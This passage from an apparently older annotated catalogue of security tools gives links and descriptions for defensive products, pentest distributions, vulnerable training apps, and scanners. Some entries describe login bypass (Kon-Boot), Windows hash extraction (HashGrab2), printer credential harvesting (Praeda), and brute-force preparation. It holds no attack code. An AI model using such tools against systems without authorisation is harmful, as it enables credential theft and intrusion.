which is easy to use and doesn't require a lot of support of other depend encies. Also not forgetting that winAUTOPWN unlike other frameworks maintains the origin al exploit writer's source code intact just as it was and uses it. This way the exploit writer's credit and originality is maintained. The source is modified on ly when required to enable a missing feature or to remove hard-coded limitations . Under these circumstances also, the exploit writer's credits remain intact. Newer exploit modules are added as and when they release and older ones are also being daily added. Binaries of perl, php, python and cygwin DLLs (included) are required to exist e ither in a common folder or should be properly installed with their paths regist ered for those exploits which are cannot be compiled into a PE-exe. Some anti-viruses might falsely detect the exploits as malicious. Cheat Sheets Common Ports

http://packetstormsecurity.org/papers/cheatsheets/common-ports.pdf Hping http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf NMAP http://sbdtools.googlecode.com/files/Nmap5 cheatsheet eng v1.pdf OWASP Testing Guide http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf Wireshark Display Filters http://packetstormsecurity.org/papers/cheatsheets/Wireshark_Display_Filters.pdf Defensive Anti Meterpreter http://www.mertsarica.com/codes/antimeter.zip Antimeter is a very useful tool for internal security administrators who can sca n their systems for meterpreter session remains after they have successfully exp loited any system with Metasploit. ArpON http://arpon.sourceforge.net/index.html ArpON (Arp handler inspectiON) is a portable handler daemon that make Arp secure in order to avoid Arp Spoofing/Poisoning & co. This is possible using two kinds of anti Arp Poisoning tecniques, the first is b ased on SARPI or "Static Arp Inspection", the second on DARPI or "Dynamic Arp In spection" approach. Keep in mind other common tools fighting ARP poisoning usually limit their activ ity only to point out the problem instead of blocking it, ArpON does it using SA RPI and DARPI policies. Finally you can use ArpON to pentest some switched/hubbe d LAN with/without DHCP protocol, in fact you can disable the daemon in order to use the tools to poison the ARP Cache. Remember it doesn't affect the communication efficiency of the ARP protocol! - It replaces Arpwatch & co; ArpON blocks; - It detects and blocks Arp Poisoning/Spoofing attacks in statically configured networks; - It detects and blocks Arp Poisoning/Spoofing attacks in dinamically configured (DHCP) networks; - It detects and blocks unidirectional and bidirectional attacks; - It manages the network interface into unplug, boot, hibernation and suspension OS features; - Easily configurable via command line switches, provided that you have root per missions; - It works in userspace for OS portability reasons; - Tested against Ettercap, Cain & Abel, dsniff and other tools. Firewall

Astaro Security Gateway http://www.astaro.com/landingpages/en-worldwide-essential-firewall The Essential Firewall edition provides protection for unlimited IP addresses an d the following features without any time limitations: - Networking: Internet Router, Bridging, DNS server & proxy, DynDNS, DHCP server & relay, NTP support, automatic QoS - Network Security: Stateful Packet Inspection Firewall & Network Address transl ation (DNAT/SNAT/Masquerading) - Remote Access: PPTP and L2TP over IPSec support (including iPhone support) - Logging/Reporting: Full logging on local hard drive, searching, real-time repo rts for hardware, network usage and network security, daily executive reports - Management: Web-based GUI in local languages, setup wizard, configuration back up & restore, administrator notifications, SNMP support, centralized management via Astaro Command Center (also free of charge) Which Platforms are Supported by the Essential Firewall Edition? The Essential Firewall software is available as a software and virtual appliance . Both versions offer the identical feature set and include a hardened linux ope rating system. * The software appliance can be either installed on a dedicated Intel-compatible PC or within a virtual machine. * The virtual appliance can be run directly in any VMware vSphere Edition Running an Astaro Security Gateway within a virtual machine protects your enviro nment twice: * External communication - Defense against threats from the Internet, e.g. Troja ns and viruses * Inter-VM communication - Controls and monitors data traffic between virtual ma chines GreenSQL http://www.greensql.net/download GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy for SQL commands and has built in s upport for MySQL. IDS/IPS Ossec http://www.ossec.net/main/ OSSEC is a scalable, multi-platform, open source Host-based Intrusion Detection System (HIDS). It has a powerful correlation and analysis engine, integrating lo g analysis, file integrity checking, Windows registry monitoring, centralized po licy enforcement, rootkit detection, real-time alerting and active response. Patriot NG http://www.security-projects.com/?Patriot_NG Patriot is a 'Host IDS' tool which allows real time monitoring of changes in Win dows systems or Network attacks. Patriot monitors: * Changes in Registry keys: Indicating whether any sensitive key (autorun, inter

net explorer settings...) is altered. * New files in 'Startup' directories * New Users in the System * New Services installed * Changes in the hosts file * New scheduled jobs * Alteration of the integrity of Internet Explorer: (New BHOs, configuration cha nges, new toolbars) * Changes in ARP table (Prevention of MITM attacks) * Installation of new Drivers * New Netbios shares * TCP/IP Defense (New open ports, new connections made by processes, PortScan de tection...) * Files in critical directories (New executables, new DLLs...) * New hidden windows (cmd.exe / Internet Explorer using OLE objects) * Netbios connections to the System * ARP Watch (New hosts in your network) * NIDS (Detect anomalous network traffic based on editable rules) Suricata http://www.openinfosecfoundation.org/index.php/downloads The Suricata Engine is an Open Source Next Generation Intrusion Detection and Pr evention Engine. This engine is not intended to just replace or emulate the exis ting tools in the industry, but will bring new ideas and technologies to the fie ld. OISF is part of and funded by the Department of Homeland Security's Directorate for Science and Technology HOST program (Homeland Open Security Technology), by the the Navy's Space and Naval Warfare Systems Command (SPAWAR), as well as thro ugh the very generous support of the members of the OISF Consortium. More inform ation about the Consortium is available, as well as a list of our current Consor tium Members. The Suricata Engine and the HTP Library are available to use under the GPLv2. The HTP Library is an HTTP normalizer and parser written by Ivan Ristic of Mod S ecurity fame for the OISF. This integrates and provides very advanced processing of HTTP streams for Suricata. The HTP library is required by the engine, but ma y also be used independently in a range of applications and tools. samhain http://la-samhna.de/samhain/ The Samhain host-based intrusion detection system (HIDS) provides file integrity checking and log file monitoring/analysis, as well as rootkit detection, port m onitoring, detection of rogue SUID executables, and hidden processes. Samhain been designed to monitor multiple hosts with potentially different opera ting systems, providing centralized logging and maintenance, although it can als o be used as standalone application on a single host. About Beltane Beltane is a web-based central management console for the Samhain file integrity / intrusion detection system. It enables the administrator to browse client mes sages, acknowledge them, and update centrally stored file signature databases. As the Samhain daemon keeps a memory of file changes, the file signature databas e need only be up to date when the daemon restarts and downloads the database fr

om the central server. Beltane allows you to use the information logged by the c lient in order to update the signature database. snorby http://www.snorby.org Snorby is a new and modern Snort IDS front-end. The basic fundamental concepts b ehind snorby are simplicity and power. The project goal is to create a free, ope n source and highly competitive application for network monitoring for both priv ate and enterprise use. NAC PacketFence http://www.packetfence.org/en/home.html PacketFence is a free and open source network access control (NAC) system. Packe tFence is actively maintained and has been deployed in numerous large-scale inst itutions over the past years. It can be used to effectively secure networks - fr om small to very large heterogeneous networks. opendlp http://code.google.com/p/opendlp/ OpenDLP is a free and open source, agent-based, centrally-managed, massively dis tributable data loss prevention tool released under the GPL. Given appropriate W indows domain credentials, OpenDLP can simultaneously identify sensitive data at rest on hundreds or thousands of Microsoft Windows systems from a centralized w eb application. OpenDLP has two components: a web application and an agent. Web Application * Automatically deploy and start agents over Netbios * When done, automatically stop, uninstall, and delete agents over Netbios * Pause, resume, and forcefully uninstall agents in an entire scan or on individ ual systems * Concurrently and securely receive results from hundreds or thousands of deploy ed agents over two-way-trusted SSL connection * Create Perl-compatible regular expressions (PCREs) for finding sensitive data at rest * Create reusable profiles for scans that include whitelisting or blacklisting d irectories and file extensions * Review findings and identify false positives * Export results as XML * Written in Perl with MySQL backend Agent * Runs on Windows 2000 and later systems * Written in C with no .NET Framework requirements * Runs as a Windows Service at low priority so users do not see or feel it * Resumes automatically upon system reboot with no user interaction * Securely transmit results to web application at user-defined intervals over tw o-way-trusted SSL connection * Uses PCREs to identify sensitive data inside files * Performs additional checks on potential credit card numbers to reduce false po sitives scannedonly

http://olivier.sessink.nl/scannedonly/ Scannedonly is a samba VFS module and a scanning daemon that ensure that only fi les that have been scanned for viruses are visible and accessible to the end use r. Scannedonly comes in two parts: a samba vfs module (included in samba since samb a-3.5.0) and (one or more) daemons. The daemon scans files. If a certain file is clean, a second file is created with prefix .scanned:. The samba module simply looks if such a .scanned: file exists, and is newer than the pertinent file. If this is the case, the file is shown to the user. If this is not the case, the fi le is not returned in any directory listing, and cannot be opened. The samba vfs module will also tell the daemon to scan this file. So what happens for the user. The first time a directory is listed, it is empty, but after a first refresh all files are shown. There is a utility scannedonly_p rescan that can help you to prescan all directories. If a virus is found by the daemon, a file with a warning message is created in t he directory of the user, a warning is sent to the logs, and the file is renamed to have prefix .virus:. Files with the .virus: prefix are never shown to the us er and all access is denied. Management Content Dradis Framework http://dradisframework.org/ Dradis is an open source framework to enable effective information sharing. Drad is is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead . Network Spiceworks http://www.spiceworks.com/ Spiceworks is the complete network management & monitoring, helpdesk, PC invento ry & software reporting solution to manage Everything IT in small and medium bus inesses. Spiceworks Lets You... * * * * * * * * * * Inventory Your Network & PCs Monitor & Manage Your Network Manage Your IT Assets Manage Changes & Configurations Map Your NetworkBETA Audit Your Software Troubleshoot Your Network Run an IT Help Desk Be an MSP Talk to IT Pros Like You

Spiceworks IT Desktop is designed for * IT Pros who have admin rights on their network. * Organizations with less than 500 devices on their network. It will work with m

ore but it wont be as fast. * Running on a PC. It discovers Windows, OS X, Linux and Unix but you need to ru n it from a PC on your network. lansweeper http://www.lansweeper.com/ Lansweeper: hardware, network and software inventory for windows networks Lansweeper is an automated network discovery tool which scans all your computers and devices and displays them in an easy accessible web interface. There is no need to install any agents on the computers, all scanning is done by standard build-in functionality (wmi, snmp, ssh,...) OS Distro Katana http://www.hackfromacave.com/katana.html Katana Is a portable multi-boot security suite designed for many of your compute r security needs. The idea behind this tool is to bring together all of the best security distributions to run from one USB drive. Katana includes distributions which focus on Penetration Testing, Auditing, Password Cracking, Forensics and Honey Pots. LAMPSecurity http://sourceforge.net/projects/lampsecurity/ LAMPSecurity training is designed to be a series of vunlerable virtual machine i mages along with complementary documentation designed to teach linux,apache,php, mysql security. Matriux http://www.matriux.com/ The Matriux is a phenomenon that was waiting to happen. It is a fully featured s ecurity distribution consisting of a bunch of powerful, open source and free too ls that can be used for various purposes including, but not limited to, penetrat ion testing, ethical hacking, system and network administration, cyber forensics investigations, security testing, vulnerability analysis, and much more. It is a distribution designed for security enthusiasts and professionals, although it can be used normally as your default desktop system. Network Security Toolkit http://sourceforge.net/projects/nst/ The Network Security Toolkit (NST) is a bootable ISO live CD/DVD (NST Live) and i s based on Fedora. The toolkit was designed to provide easy access to best-of-br eed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. An advanced Web User Interface (WUI) is provided for system administrati on, navigation, automation and configuration of many network and security applic ations found within the NST distribution. In the virtual world, NST can be used as a network security analysis, validation and monitoring tool on enterprise vir tual servers hosting virtual machines. NST also makes an excellent tool to help one with crash recovery troubleshooting scenarios and diagnostics. OWASP Broken Web Applications Project http://code.google.com/p/owaspbwa/wiki/Downloads

Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Mach ine in VMware format compatible with their no-cost VMware Player and VMware Serv er products (along with their commercial products). http://sourceforge.net/projects/owaspbwa/files/ Pentoo http://www.pentoo.ch/ Qubes http://qubes-os.org/ Qubes implements Security by Isolation approach. To do this, Qubes utilizes virt ualization technology, to be able to isolate various programs from each other, a nd even sandbox many system-level components, like networking or storage subsyst em, so that their compromise dont affect the integrity of the rest of the system.

Qubes lets the user define many security domains implemented as lightweight Virt ual Machines (VMs), or AppVMs. E.g. user can have personal, work, shopping, bank, a m AppVMs and can use the applications from within those VMs just like if they wer e executing on the local machine, but at the same time they are well isolated fr om each other. Qubes supports secure copy-and-paste and file sharing between the AppVMs, of course. Samurai http://sourceforge.net/projects/samurai/files/ The Samurai Web Testing Framework is a LiveCD focused on web application testing . We have collected the top testing tools and pre-installed them to build the pe rfect environment for testing applications. WeakNet Linux http://weaknetlabs.com/main/ A must-have for anyone interested in Security or Forensics, this CD-sized distro contains all the tools you need to test your skills and excel in the field of IN FOSEC. Johnny Long (iHackCharities.org) Web Security Dojo http://www.mavensecurity.com/dojo.php Web Security Dojo A free open-source self-contained training environment for Web Application Secur ity penetration testing. Tools + Targets = Dojo What? Various web application security testing tools and vulnerable web applications w ere added to a clean install of Ubuntu v9.10. Why? The Web Security Dojo is for learning and practicing web app security testing te chniques. It is ideal for training classes and conferences since it does not nee d a network connection. The Dojo contains everything needed to get started - too ls, targets, and documentation. Convenient virtual machine image (VirtualBox recommended, VMware provided) Targets include: * OWASP's WebGoat v5.2

* * * *

Damn Vulnerable Web App v1.0.6 Hacme Casino v1.0 OWASP InsecureWebApp v1.0 simple training targets by Maven Security (including REST and JSON)

Tools: * * * * * * * * * Burp Suite (free version) v1.3 w3af cvs version OWASP Skavengerv0.6.2a OWASP Dirbuster v1.0 RC1 Paros v3.2.13 Webscarab v20070504-1631 Ratproxy v1.57-beta sqlmap v0.7 helpful Firefox add-ons

kon-boot http://www.piotrbania.com/all/kon-boot/ Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel (and now Windows kernel also!!!) on the fly (while booting). In the current compilation state it allows to log into a linux system as 'root' user w ithout typing the correct password or to elevate privileges from current user to root. For Windows systems it allows to enter any password protected profile wit hout any knowledge of the password. Others Agnitio http://sourceforge.net/projects/agnitiotool/ A tool to help developers and security professionals conduct manual security cod e reviews in a consistent and repeatable way. Agnitio aims to replace the adhoc nature of manual security code review documentation, create an audit trail and r eporting. Features * * * * Security code reviews Security code review metrics and reporting Application security code review tool Static analysis security guidance and reporting

Buck Security http://buck-security.sourceforge.net/index.html Buck Security is a collection of security checks for Linux. It was designed for Debian and Ubuntu servers, but can be useful for any Linux system. The aim of Buck Security is, to allow you to get a quick overview of the securit y status of your system. As a linux system administrator - but also as a normal linux user - you often wonder if your system is secure. In this situation it is useful to get an overvirew of the security status of the system immediately. Buc k Security was designed exactly for this. It runs important tests and returns th e results to you after a couple of minutes. By now the following tests are implemented: * Searching for worldwriteable files

* * * * * * *

Searching for worldwriteable directories Searching for programs where the setuid is set Searching for programs where the setgid is set Checking your umask Checking if the sticky-bit is set for /tmp Searching for superusers Searching for installed attack tools packages

CERT Basic Fuzzing Framework http://www.cert.org/download/bff/d.html The Basic Fuzzing Framework (BFF) consists of two main parts: * a Linux virtual machine that has been optimized for fuzzing * a set of scripts and a configuration file that orchestrate the fuzzing run The virtual machine is a stripped-down Debian installation with the following mo difications: * The Fluxbox window manager is used instead of the heavy Gnome or KDE desktop e nvironments. * Fluxbox is configured to not raise or focus new windows. This can help in situ ations where you may need to interact with the guest OS while a GUI application is being fuzzed. * Memory randomization is disabled. * VMware Tools is installed, which allows the guest OS to share a directory with the host. * The OS is configured to automatically log in and start X. * sudo is configured to not prompt for a password. * strip is symlinked to /bin/true, which prevents symbols from being removed whe n an application is built. The fuzzer used by the BFF is Sam Hocevar's zzuf application. It was chosen for its deterministic behavior, number of features, and lightweight size. Crunch http://sourceforge.net/projects/crunch-wordlist/ Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations. Features: * * * * * * crunch generates wordlists in both combination and permutation ways it can breakup output by number of lines or file size now has resume support pattern now supports number and symbols pattern now supports upper and lower case characters separately adds a status report when generating multiple files

Fierce http://ha.ckers.org/fierce/ First what Fierce is not. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any un-targeted attacks. It is meant specifically to locate likely targets both inside and outside a corp orate network. Only those targets are listed (unless the -nopattern switch is us ed). No exploitation is performed (unless you do something intentionally malicio us with the -connect switch). Fierce is a reconnaissance tool. Fierce is a Perl

script that quickly scans domains (usually in just a few minutes, assuming no ne twork lag) using several tactics. HashGrab2 http://forum.intern0t.net/hacking-tools-utilities/2538-hashgrab-py-automatically -get-windows-login-hashes.html HashGrab2 automatically mounts any Windows drives it can find, and using samdump 2 extracts username-password hashes from SAM and SYSTEM files located on the Win dows drive, after which it writes them to user specified directory. Jarlsberg http://jarlsberg.appspot.com/ Jarlsberg is a collection of codes, that shows how web application vulnerabiliti es can be exploited and how to defend against these attacks. It can teach you ho w to attack an application using common web security vulnerabilities, like cross -site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). It can also teach you how to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information d isclosure, SQL injection, browser phishing or remote code execution. In other wo rds, it first teaches you how hacking works and then it lets you attack itself w ith those attacks! This is how hands on learning should be! Google likes to describe Jarlsberg as a cheesy web application that was intentio nally built with a number of vulnerabilities. The only pre-requisite is that you should have a general understanding as to how a web application works and some knowledge about HTML, templates, cookies, AJAX, Python (since it is written in P ython), etc. You play the role of a hacker in this test. It gives you a brief de scription about a vulnerability and then you have the task of exploiting this vu lnerability! Simple as that! You are allowed to use your favourite tools such as Burp Proxy, Fiddler, Watcher, etc in your endeavors. MetaGooFil http://www.edge-security.com/metagoofil.php Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,odp,ods) availables in the target/victim websi tes. It will generate a html page with the results of the metadata extracted, plus a list of potential usernames very useful for preparing a bruteforce attack on ope n services like ftp, pop3,web applications, vpn, etc. Also it will extract a lis t of disclosed PATHs in the metadata, with this information you can guess OS, ne twork names, Shared resources, etc. This new version extracts MAC address from Microsoft Office documents. Now you c an have an idea of what kind of hardware they are using. All this information should not be available on the net, but most of the compani es doesn't have policies about information leaking... and most of them don't kno w this information exists. So you can show them what information an attacker can obtain, with this simple technique. RSMangler http://www.randomstorm.com/rsmangler-security-tool.php RSMangler will take a wordlist and perform various manipulations on it similar t o those done by John the Ripper with a few extras. The main new feature is permutations mode which takes each word in the list and

combines it with the others to produce all possible permutations (not combinatio ns, order matters). For example the words freds, fresh, fish will produce the fo llowing list: freds fresh fish fredsfresh fredsfish freshfreds freshfish fishfreds fishfresh fredsfreshfish fredsfishfresh freshfredsfish freshfishfreds fishfredsfresh fishfreshfreds Each of these new words is then subject to the other mangles, because of this we strongly recommend with permutations mode enabled (default) you use a very smal l wordlist, 3 start words create a final list containing 4245 words and 5 start words creates a list containing 91975. As a test we tried it with a few hundred words and gave up when the output file got to 3G. VIDigger http://www.foundstone.com/us/resources/proddesc/vidigger.htm VIDigger is a tool designed to help VMware Virtual Infrastructure administrators harden their environment. Though the core technology of VMware is designed to b e secure, there are many configuration settings and deployment considerations th at can severely impact the overall security of the deployed Virtual Infrastructu re. VIDigger is designed to help administrators check the configuration of ESX s erver and the virtual machines hosted on ESX server against the VMware Infrastru cture Hardening guide and other best practices. VIDigger will retrieve configuration data about the host and virtual machines an d then deliver a customizable report of problematic areas to the Virtual Adminis trator. VIDigger is intended to be used throughout the deployment lifecycle both as a hardening tool and a change tracking tool that brings configuration settin gs changes to the attention of the administrator. The tool focused on changes th at may impact the overall security of the ESX host or virtual machine(s) deploye d on the ESX host. One of the most exciting features of VIDigger is that it can be extended to add new checks as new components are added to the virtual infrastructure not current ly scanned by the tool. Vicnum http://sourceforge.net/projects/vicnum/ Vicnum is a flexible and vulnerable web application which demonstrates common we b security problems such as cross site scripting, sql injections, and session ma nagement issues. The program is especially useful to IT auditors honing web secu rity skills and setting up capture the flag type exercises. Being a small web application with no complex framework involved, Vicnum can eas ily be invoked and tailored to meet a specific need. For example if a test vulne rable application is needed in evaluating a web security scanner or a web applic

ation firewall, you might want to control a target web application to see what t he scanner can find and what the firewall can protect. Ultimately the major goal of this project is to strengthen security of web appli cations by educating different groups (students, management, users, developers, auditors) as to what might go wrong in a web app. And of course its OK to have a little fun. sara http://www-arc.com/sara/ The Security Auditor's Research Assistant (SARA) is a third generation network s ecurity analysis tool that that has been available and actively updated for over 10 years. Sadly, all good things have to come to an end and so it goes for SARA . SARA 7.9.1 is our last release. Actually, SARA-7.9.2a is the final release. SARA: 1. Operates under Unix, Linux, MAC OS/X or Windows (through coLinux) OS'. 2. Integrates the National Vulnerability Database (NVD). 3. Performs SQL injection tests. 4. Performs exhaustive XSS tests 5. Can adapt to many firewalled environments. 6. Support remote self scan and API facilities. 7. Used for CIS benchmark initiatives 8. Plug-in facility for third party apps 9. CVE standards support 10. Enterprise search module 11. Standalone or daemon mode 12. Free-use open SATAN oriented license xplico http://www.xplico.org/ The goal of Xplico is extract from an internet traffic capture the applications data contained. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP pr otocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. Xplico isnt a network protocol analyzer. Xplico is an open source Network Forensic Analy sis Tool (NFAT). Scanner CHScanner http://code.google.com/p/chscanner/ CHScanner is an ARP, IPv4 and IPv6 network scanner with 31 scan methods: it scan s for open ports, protocols, NetBIOS informations and Windows shares, SNMP infor mation, and WMI (WBEM) information. It also have the ability to turn on (using W ake-On-LAN) and to shutdown or reboot a remote Windows host. Features an automat ic (scriptable) working mode, a hunt mode, a passive mode and the normal scannin g mode. Some details The main differences between CHScanner and other similar tools are: * CHScanner use an Operating System Mimic Technology; * CHScanner has a lot more scanning methods compared with many other scanners, s tarting from the Layer 2 of the OSI model. It does not only scans IPv4 addresses

, it also uses ARP, IGMP, IPv6 and some higher level protocols like NetBIOS, SNM P and WMI; * It is very flexible, scanning being done based on user defined configuration f iles, and quite fast; * Besides the skinnable graphical interface, CHScanner can be used from command line to automate the scans. Scanning modes * Normal mode: this is the common mode used by most of the scanners today; * Passive mode: in this mode NO packet is sent, CHScanner only listen to the net work traffic and decodes the packets received, similar to a sniffer; * Hunt mode: introduced with version 0.9.7.2, in this mode CHScanner will scan a ny host that tries to communicate with the host machine. The scan is triggered b y received one of the following packets destined to the local machine: ARP Reque st, ICMP ECHO Request, TCP SYN. By using geolocation data provided by MaxMind you can find the country associate d with a specific IPv4 Address; * Automatic, scriptable, mode: if instructed so, by command line parameters, CHS canner will do his job based on the configuration file supplied as one of the pa rameters, save the result and close. Operating System Mimic Technology short description Basically, this means that the packets it sends emulates the behavior of various operating systems and/or their native tools (where is the case). Currently it e mulates the following : * * * * * * Windows XP Professional SP2 Windows 2003 Server Linux kernel 2.4 (Adamantix based) Linux kernel 2.6 (Fedora Core based) Solaris 8 OpenSolaris (Nevada 35)

There is also a "random" mode where the packets have the identification data ran dom generated. The Solaris 8 emulation may not be continued and emulation for Op enSolaris (Nevada 35) may be added. CSniffer http://download.mcafee.com/products/tools/csniffer/csniffer.exe This tool acts much like a standard Ethernet network sniffer. However, unlike a traditional packet sniffer it doesnt attempt to capture and decode all traffic bu t instead is geared toward discovering useful infrastructure and security-relate d data from the network, often from traffic not sent to or from the host system i.e. general broadcast network traffic. This data can reveal all manner of usefu l information, ranging from live systems on the network, hostnames, Ipv6 systems , routers and name servers, user names and passwords. Tool requirements CSniffer runs on Microsoft Windows systems (Windows 2000 upwards) and attempts t o sniff network data in promiscuous mode. It can use one of two methods to achie ve this: - Using Windows built-in raw sockets API (default). - Using the WinPcap packet driver.

Limitations Other than the aforementioned requirements of running under an administrator lev el account, there are some severe limitations when using the built-in Windows ra w sockets mode. The Microsoft raw sockets API has several restrictions that have been introduced over the years in an effort to reduce security risks associated with low level network packet access. Depending on what platform you are running on you may fin d that you are limited in what data can be seen on the network. A comprehensive list of all known limitations seen on different Windows operating systems and se rvice pack levels of those operating systems has not been compiled, but here are some known issues. Again, this only applies to Windows raw sockets mode. - Outgoing UDP and ICMP packets are not captured (OS, SP specific). - On Windows XP Sp1, XP Sp3 and Vista no outgoing packets of any kind are captur ed. - On Windows Vista with Sp1, only UDP packets are captured. TCP packets are not captured. Flint http://runplaybook.com/p/11 Flint examines firewalls, quickly computes the effect of all the configuration r ules, and then spots problems so you can: * CLEAN UP RUSTY CONFIGURATIONS that are crudded up with rules that can't match traffic. * ERADICATE LATENT SECURITY PROBLEMS lurking in overly-permissive rules * SANITY CHECK CHANGES to see if new rules create problems. Why you need Flint You have multiple firewalls protecting internal networks from the Internet and c ontrolling access to customer data. Your business changes, and so do your firewa lls, and not always at the same time. Firewalls can get out of step with policie s. Everybody makes mistakes. To understand a firewall configuration, you have to re ad hundreds of configuration lines, and then you have to think like a firewall d oes. People aren't good at thinking like firewalls. So most firewalls are riddle d with subtle mistakes. Some of those mistakes can be expensive: * INSECURE SERVICES might be allowed through the firewall, preventing it from bl ocking attacks. * LAX CONTROLS ON DMZs may expose staging and test servers. * FIREWALL MANAGEMENT PORTS may be exposed to untrusted networks. * REDUNDANT FIREWALL RULES may be complicating your configuration and slowing yo u down. What You Can Do With Flint CHECK RULES BEFORE DEPLOYING THEM Flint prevents engineers from making costly mi stakes. It takes just moments for Flint to evaluate a ruleset and spot errors. Y our team can have it up and running in minutes. Flint is low-drag, no drama. CLEAN UP RUSTY RULESETS Flint does the hard work of scouring firewall rules for useless crud, saving you time and allowing your team to focus on engineering pro blems that really matter. Flint can spot redundant and contradictory rules, and

Flint makes it easier to spot business-level problems. COMPREHEND COMPLEX CONFIGURATIONS Flint doesn't just check firewalls for problem s. It also fully understands the meanings of configuration lines, and breaks the m down for you by service or by interface, so you can see at a glance what any g iven firewall is doing. How to get Flint Flint is distributed in source form. It is implemented in ruby. Microsoft Attack Surface Analyzer http://www.microsoft.com/downloads/en/details.aspx?FamilyID=1283b765-f57d-4ebb-8 f0a-c49c746b44b9&displaylang=en&pf=true#Overview Attack Surface Analyzer is the same tool used by Microsoft's internal product te ams to catalogue changes made to the operating system by the installation of new software. Attack Surface Analyzer takes a snapshot of your system state before and after t he installation of product(s) and displays the changes to a number of key elemen ts of the Windows attack surface. This allows: - Developers to view changes in the attack surface resulting from the introducti on of their code on to the Windows platform - IT Professionals to assess the aggregate Attack Surface change by the installa tion of an organization's line of business applications - IT Security Auditors evaluate the risk of a particular piece of software insta lled on the Windows platform during threat risk reviews - IT Security Incident Responders to gain a better understanding of the state of a systems security during investigations (if a baseline scan was taken of the s ystem during the deployment phase) Microsoft Baseline Security Analyzer http://www.microsoft.com/downloads/details.aspx?FamilyID=b1e76bbe-71df-41e8-8b52 -c871d012ba78&displaylang=en The Microsoft Baseline Security Analyzer provides a streamlined method to identi fy missing security updates and common security misconfigurations. MBSA 2.1.1 is a minor upgrade to add support for Windows 7 and Windows Server 2008 R2. Nessus http://www.nessus.org/nessus/ The Nessus vulnerability scanner is the world-leader in active scanners, featurin g high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners c an be distributed throughout an entire enterprise, inside DMZs and across physic ally separate networks. Netbios-shares-scanner http://www.aldeid.com/index.php/Netbios-shares-scanner Netbios Shares Scanner has been developed by SecPoint. The tool scans an IP addr ess and tries to retrieve shared disks and their content. It works for Windows w orkstations/servers as well as for Linux boxes (smbclient used for login). Plecost http://www.iniqua.com/labs/plecost/

Wordpress finger printer tool search and retrieve information about the plugins versions installed in Wordpress systems. It can analyze a single URL or perform an analysis based on the results indexed by Google. Additionally displays CVE code associated with each plugin, if there. Praeda http://www.foofus.net/?page_id=218 http://www.foofus.net/?p=223 By taking advantage of poor printer security and vulnerabilities during penetrat ion testing we are able to harvest a wealth of information from MFP devices incl uding user-names, email addresses, user address books, authentication informatio n including SMB, Email, LDAP passwords, etc. Sometimes, they could also aid you in remote retrieval of prints, faxes, scan copies! Certain printer installations could also allow you to access the HTTP interface, and make a configuration cop y! This could allow you to further see the internals! In short, PRAEDA is design ed to automate some of the information gathering from network appliances through web-management interfaces such as printers and network appliances. This open source tool is programmed in Perl and has several modules that focus o n almost 28 devices in all! The module to be used is enumerated from the differe nt models of printers using Title page and Server type responses from the printer ma nagement page. Its required Perl modules are: LWP::Simple LWP::UserAgent HTML::TagParser URI::Fetch HTTP::Cookies Sample syntax: praeto.pl TARGET_FILE TCP_PORT PROJECT_NAME OUTPUT_FILE RIPS http://sourceforge.net/projects/rips-scanner/ RIPS is a static source code analyser for vulnerabilities in PHP webapplications . RIPS automates the process of identifying potential security flaws in PHP source code by using static source code analysis. Features of RIPS: - detect XSS, SQLi, File disclosure, LFI/RFI, RCE vulnerabilities and more - 5 verbosity levels for debugging your scan results - mark vulnerable lines in source code viewer - user-defined function code by mouse-over on detected call - list of all user-defined functions and program entry points (user input) conne cted to the source code viewer - create CURL exploits for detected vulnerabilities with few clicks - 7 different syntax highlighting colour schema - only minimal requirement is a local webserver with PHP and a browser Seccubus

http://sourceforge.net/projects/seccubus/ Tool to automatically fire regular security scans with Nessus. Compare results o f the current scan with the previous scan and report on the delta in a web inter face. Main objective of the tool is to make repeated scans more efficient SkipFish http://code.google.com/p/skipfish/ A fully automated, active web application security reconnaissance tool. Key feat ures: * High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets. * Ease of use: heuristics to support a variety of quirky web frameworks and mixe d-technology sites, with automatic learning capabilities, on-the-fly wordlist cr eation, and form autocompletion. * Cutting-edge security logic: high quality, low false positive, differential se curity checks, capable of spotting a range of subtle flaws, including blind inje ction vectors. The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) en vironments. SoftPerfect Network Scanner http://www.softperfect.com/products/networkscanner/ SoftPerfect Network Scanner is a free multi-threaded IP, NetBIOS and SNMP scanne r with a modern interface and many advanced features. It is intended for both sy stem administrators and general users interested in computer security. The progr am pings computers, scans for listening TCP/UDP ports and displays which types o f resources are shared on the network (including system and hidden). In addition, it allows you to mount shared folders as network drives, browse the m using Windows Explorer, filter the results list and more. SoftPerfect Network Scanner can also check for a user-defined port and report back if one is open. I t can also resolve host names and auto-detect your local and external IP range. It supports remote shutdown and Wake-On-LAN. Key features * Pings computers and displays those alive. * Detects hardware MAC-addresses, even across routers. * Detects hidden shared folders and writable ones. * Detects your internal and external IP addresses. * Scans for listening TCP ports, some UDP and SNMP services. * Retrieves currently logged-on users, configured user accounts, uptime, etc. * You can mount and explore network resources. * Can launch external third party applications. * Exports results to HTML, XML, CSV and TXT * Supports Wake-On-LAN, remote shutdown and sending network messages. * Retrieves potentially any information via WMI. * Retrieves information from remote registry, file system and service manager. * It is absolutely free, requires no installation, and does not contain any adwa re/spyware/malware. Vasto http://vasto.nibblesec.org/

